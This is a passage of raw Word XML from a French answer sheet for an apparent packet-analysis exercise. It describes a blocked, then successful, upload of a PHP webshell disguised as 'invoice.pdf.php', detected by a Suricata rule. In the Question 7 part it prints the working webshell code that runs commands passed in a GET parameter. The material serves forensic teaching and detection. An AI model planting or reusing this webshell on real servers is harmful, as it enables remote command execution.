      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>invoice.pdf.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">, dont le contenu correspond à un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve"> PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54898D7D" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C05D42B" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">Ce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve"> contient notamment le code suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A954B4" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69236A7C" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' 2&gt;&amp;1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EB902DF" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAFE719" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>Ce motif (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">$_) est spécifiquement surveillé par la règle NIDS configurée sur l’infrastructure, ce qui explique le déclenchement immédiat de l’alerte. Le système de détection </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">, positionné en amont du trafic entrant, a ainsi identifié la tentative d’envoi d’un fichier malveillant contenant un exécuteur de commandes système à distance </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RCE </w:t>
      </w:r>
      <w:r w:rsidRPr="006D2676">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>Remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve"> Command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79418BDC" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629F78B2" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>Le paquet n°6 est la réponse du serveur à cette tentative. Il s’agit d’un code HTTP 200 OK, ce qui signifie que la requête a été acceptée par le serveur au niveau protocolaire. Toutefois, l’analyse du corps de la réponse révèle le message d’erreur suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE63595" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA264B5" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Details: exception cannot write file ./invoices/95729/test/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>invoice.pdf.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CFE237C" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA41A92" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>Ce message indique que le téléversement du fichier PHP malveillant a échoué, vraisemblablement en raison d’un problème de permissions d’écriture sur le système de fichiers du serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C3AAA" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A836D9D" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve">Le NIDS a correctement détecté une tentative d’attaque de type RCE via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2676">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D2676">
        <w:t xml:space="preserve"> PHP, grâce à une signature précise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11026A" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A96894E" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>L’attaque n’a pas abouti techniquement, car le fichier malveillant n’a pas pu être enregistré sur le serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E454A" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0054D418" w14:textId="77777777" w:rsidR="00694DD9" w:rsidRPr="006D2676" w:rsidRDefault="00694DD9" w:rsidP="00694DD9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2676">
        <w:t>Cette tentative reste néanmoins critique, car elle démontre une intention claire de compromission du système cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7262E" w14:textId="77777777" w:rsidR="00F87396" w:rsidRDefault="00F87396" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3DF7FC" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323CB446" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765FAAE0" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8B6E03" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D49BB9F" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE6B3D0" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED0472A" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D2962A" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A11059" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5EA7C9" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0F9D37" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758A8889" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777A61EE" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A986F64" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00447E2C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A01E280" w14:textId="23F1E5B2" w:rsidR="00F87396" w:rsidRDefault="00F87396" w:rsidP="00F87396">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Question 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1952AD" w14:textId="77777777" w:rsidR="00F87396" w:rsidRDefault="00F87396" w:rsidP="00F87396"/>
    <w:p w14:paraId="0DB28C26" w14:textId="137593F6" w:rsidR="00F87396" w:rsidRPr="00BC13CE" w:rsidRDefault="00BC13CE" w:rsidP="00F87396">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC13CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Describe what happened in packets 14 and 16. Does it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC13CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>work ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC13CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Describe the content of the packet 14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C36290" w14:textId="77777777" w:rsidR="00BC13CE" w:rsidRPr="00BC13CE" w:rsidRDefault="00BC13CE" w:rsidP="00F87396">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6BE40C" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le paquet 14 correspond à une seconde requête HTTP POST émise par l’adresse IP 100.120.0.4 vers le serveur 10.87.1.2, ciblant une nouvelle fois </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ressource /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upload_invoice.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Cette requête contient un fichier PHP nommé </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invoice.pdf.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, identique à celui transmis précédemment dans le paquet 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05187EEC" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C9E00E" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le contenu du fichier est un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PHP, permettant d’exécuter des commandes système à distance à travers le paramètre cmd passé en GET. Le cœur du code est le suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A53508" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF0335E" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6BEF9794" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Copier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61970153" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AB107" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10065E9E" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRPr="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F689DA7" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRPr="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74E9BB" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        system($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>' 2&gt;&amp;1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F379182" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D61B9D" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE4BBF" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette charge malveillante a été insérée via un champ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multipart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-data, ce qui simule l’envoi d’un formulaire contenant un fichier de facture. L’intention de l’attaquant est de dissimuler un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sous l’apparence d’un document légitime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DCC602" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A542F3" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le paquet 16 contient la réponse du serveur : HTTP/1.1 200 OK. Contrairement à la première tentative (paquet 6), aucun message d’erreur ne figure dans le corps de la réponse. Au contraire, la réponse contient une confirmation explicite :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006204B" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1611CA0B" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-template</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4380D7F2" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Copier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9317C" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRPr="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C4254" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRPr="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;h1&gt;Thank </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50297A04" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRPr="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span&gt;Your invoice has been properly uploaded on our server. We'll proceed to the payment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asap.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD7B69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623ABBB3" w14:textId="77777777" w:rsidR="00CD7B69" w:rsidRDefault="00CD7B69" w:rsidP="00CD7B69">
      <w:pPr>
        <w:jc w:val="both"/>
